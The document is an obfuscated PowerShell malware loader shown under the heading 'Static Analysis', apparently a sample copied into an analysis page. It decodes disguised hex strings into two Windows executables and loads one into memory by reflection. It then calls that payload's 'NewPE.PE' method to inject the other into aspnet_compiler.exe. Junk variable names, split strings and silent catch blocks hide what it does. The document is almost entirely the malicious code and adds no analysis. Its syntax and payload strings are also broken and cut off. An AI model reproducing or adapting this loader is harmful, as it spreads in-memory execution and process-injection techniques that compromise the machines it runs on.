Static Analysis

Function Here([String] $EYUHSBH3567574JN3532434765675723426869797097957547464356457654686789768970456456464) {

$JN5634646756797897890456745643635353535565676978979678574563523534564675785678 = [System.Collections.Generic.List[Byte]]::new()

for ($i = 0; $i -lt $EYUHSBH3567574JN3532434765675723426869797097957547464356457654686789768970456456464.Length; $i +=8) {

$JN5634646756797897890456745643635353535565676978979678574563523534564675785678.Add([Convert]::ToByte($EYUHSBH3567574JN3532434765675723426869797097957547464356457654686789768970456456464.Substring($i, 8), 2))

return [System.Text.Encoding]::ASCII.GetString($JN5634646756797897890456745643635353535565676978979678574563523534564675785678.ToArray())

function ReturnShellAlosh {

param($Alosh)

$Alosh = $Alosh -split '(..)' | ? { $_ }

ForEach ($J46342423DF34253W245GF3WV52V25322353532V534V65V36B36B3BV63BV3475BN5V6G23C525235CX23C52352V35B21365BV3463V56345V345345364V5764574N74VG543 in $Alosh){

[Convert]::ToInt32($J46342423DF34253W245GF3WV52V25322353532V534V65V36B36B3BV63BV3475BN5V6G23C525235CX23C52352V35B21365BV3463V56345V345345364V5764574N74VG543,16)

$aloooooooo = '4D5@9OOOO3OOOOOOO4OOOOOOFFFFOOOOB8OOOOOOOOOOOOOO4OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO8OOOOOOOOE!FB@OEOOB4O9CD2!B8O!4CCD2!546869732O7O726F67726!6D2O636!6E6E6F742O62652O72756E2O696E2O444F532O6D6F64652EODODO@24OOOOOOOOOOOOOO5O45OOOO4CO!O3OO8@25OB65OOOOOOOOOOOOOOOOEOOOO2O!OBO!O8OOOOF8OOOOOOO@OOOOOOOOOOOO5E!6O!OOOO2OOOOOOO2OO!OOOOOO4OOOOO2OOOOOOOO2OOOOO4OOOOOOOOOOOOOOO4OOOOOOOOOOOOOOOO6OO!OOOOO2OOOOOOOOOOOOO2OO6O85OOOO!OOOOO!OOOOOOOOO!OOOOO!OOOOOOOOOOOOO!OOOOOOOOOOOOOOOOOOOOOOOO8!6O!OO53OOOOOOOO2OO!OOFFO7OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO4OO!OOOCOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO2OOOOOO8OOOOOOOOOOOOOOOOOOOOOOO82OOOOO48OOOOOOOOOOOOOOOOOOOOOO2E74657874OOOOOO64F6OOOOOO2OOOOOOOF8OOOOOOO2OOOOOOOOOOOOOOOOOOOOOOOOOOOO2OOOOO6O2E72737263OOOOOOFFO7OOOOOO2OO!OOOOO8OOOOOOF@OOOOOOOOOOOOOOOOOOOOOOOOOOOO4OOOOO4O2E72656C6F63OOOOOCOOOOOOOO4OO!OOOOO2OOOOOOO2O!OOOOOOOOOOOOOOOOOOOOOOOOOO4OOOOO42OOOOOOOOOOOOOOOOO

$geGWHZ = '4D5@9OOOO3OOOOOOO4OOOOOOFFFFOOOOB8OOOOOOOOOOOOOO4OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO8OOOOOOOOE!FB@OEOOB4O9CD2!B8O!4CCD2!546869732O7O726F67726!6D2O636!6E6E6F742O62652O72756E2O696E2O444F532O6D6F64652EODODO@24OOOOOOOOOOOOOO5O45OOOO4CO!O3OO@9F734EOOOOOOOOOOOOOOOOOEOOO222OOBO!3OOOOO@2OOOOOOO6OOOOOOOOOOOO2EC!OOOOOO2OOOOOOOEOOOOOOOOOOO!OOO2OOOOOOOO2OOOOO4OOOOOOOOOOOOOOO6OOOOOOOOOOOOOOOO2OO!OOOOO2OOOOOOOOOOOOO3OO6O85OOOO!OOOOO!OOOOOOOOO!OOOOO!OOOOOOOOOOOOO!OOOOOOOOOOOOOOOOOOOOOOODCCOOOOO4FOOOOOOOOEOOOOOBEO3OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO!OOOCOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO2OOOOOO8OOOOOOOOOOOOOOOOOOOOOOO82OOOOO48OOOOOOOOOOOOOOOOOOOOOO2E74657874OOOOOO34@!OOOOOO2OOOOOOO@2OOOOOOO2OOOOOOOOOOOOOOOOOOOOOOOOOOOO2OOOOO6O2E72737263OOOOOOBEO3OOOOOOEOOOOOOOO4OOOOOO@4OOOOOOOOOOOOOOOOOOOOOOOOOOOO4OOOOO4O2E72656C6F63OOOOOCOOOOOOOOOOO!OOOOO2OOOOOO@8OOOOOOOOOOOOOOOOOOOOOOOOOOOO4OOOOO42OOOOOOOOOOOOOOOOOOOOO

[byte[]]$NB436457568567923421432433454G546KJ76KL47BHJ45K7H4LK57H5L4KH4LK57H465KL7BH4KL7BH34K6B3B6JL346N6K34N5KLBNKB3 = ReturnShellAlosh $aloooooooo

[byte[]]$H2342536JKL63K4J56GL3K4JG653LKH6346HHJKH5LBB242D4D23G4D2G3423N423NG4234N23452N3G42N3G423N432N = ReturnShellAlosh $geGWHZ

$L5333J3G3GG5KU45G3K4U53453UK535KKKKKUK5KU5K53UK5Y3K5UY345UKK431KU31KU21Y123U13U123UK1Y3U1YK412K412K44KU124124K1U241UK4K4UUK412K414K1UBKKB5KB512KU5B12KU5B12UK5KU5B23U5K23G5235KGKUGKU1G451KU24G1KU4GKU125GK1U5G1KU5G61UK6G21365GU5154K14G1KU4G1KU4G1KU5G1KU5G1UK5G1U2K5G15G12K5U12G4KU124GK1U11 = (Here("^1^^^1^1^1111^^^^11^^1^1^11^^^11^111^1^1^111^1^^^11^^1^1".Replace('^','0')))

$R2323G2DJKU4TG523KU42UK55YTGKUD245GTKU25G32K4U5UK56GK32U5GK2U5G23IL5K2G352KU5G23U5GKU253 = (Here("0^00^00^0^^0^^^00^^^0^^00^^0^^^^0^^0^0^^0^^00^0^".Replace('^','1')))

$S4645687568235SDF23534575686578653252424234536475678568462342341231312434563456467567546 = 'C:\Wi^^nd^^ows\Mi^^cro^^soft.NET\Frame^^work\v4.0.30319\asp^^net_com^^pi^^ler.^^e^^x^^e'

$A45KLHK435435H3K5H4G543HK5G3K5G34KJ53K4J532KJ452JK52KJ342KJ34G23J4G2J3K423KJ4G2KJ34K2J34G2KJ34G2KJ423K52KJ65G23J5G2KJ5GKJ367GKJ47JK67G546JKGJK52KJ34G2KJ4G2KJ4G2JK5G34KJ6G3J67KG3JK6G2K3J5G2KJ3G52JK653GJK6743J7KK4J676474 = [System.Reflection.Assembly]

$ncrx3 = $A45KLHK435435H3K5H4G543HK5G3K5G34KJ53K4J532KJ452JK52KJ342KJ34G23J4G2J3K423KJ4G2KJ34K2J34G2KJ34G2KJ423K52KJ65G23J5G2KJ5GKJ367GKJ47JK67G546JKGJK52KJ34G2KJ4G2KJ4G2JK5G34KJ6G3J67KG3JK6G2K3J5G2KJ3G52JK653GJK6743J7KK4J676474::Load(($H2342536JKL63K4J56GL3K4JG653LKH6346HHJKH5LBB242D4D23G4D2G3423N423NG4234N23452N3G42N3G423N432N))

} catch { }

try

$J4353647567424235475765869823423423E5345634634E6Y74557435E6B66BH346346B34563BN634N = $ncrx3.GetType('N' +'e' +'wP' +'E.PE');

$SE4574R5746723423547644R6JTF567474632453568UIR5 = $J4353647567424235475765869823423423E5345634634E6Y74557435E6B66BH346346B34563BN634N.'GetMethod'($L5333J3G3GG5KU45G3K4U53453UK535KKKKKUK5KU5K53UK5Y3K5UY345UKK431KU31KU21Y123U13U123UK1Y3U1YK412K412K44KU124124K1U241UK4K4UUK412K414K1UBKKB5KB512KU5B12KU5B12UK5KU5B23U5K23G5235KGKUGKU1G451KU24G1KU4GKU125GK1U5G1KU5G61UK6G21365GU5154K14G1KU4G1KU4G1KU5G1KU5G1UK5G1U2K5G15G12K5U12G4KU124GK1U11);

} catch { }

try

$HYYAW42 = $S4645687568235SDF23534575686578653252424234536475678568462342341231312434563456467567546.Replace("^^", "")

$S3SG4353466785985854684322352354364897689067895346356363746785 = [object[]]($HYYAW42, $NB436457568567923421432433454G546KJ76KL47BHJ45K7H4LK57H5L4KH4LK57H465KL7BH4KL7BH34K6B3B6JL346N6K34N5KLBNKB3)

$SE4574R5746723423547644R6JTF567474632453568UIR5.$R2323G2DJKU4TG523KU42UK55YTGKUD245GTKU25G32K4U5UK56GK32U5GK2U5G23IL5K2G352KU5G23U5GKU253.Invoke($null, $S3SG4353466785985854684322352354364897689067895346356363746785)

} catch { }

} catch { }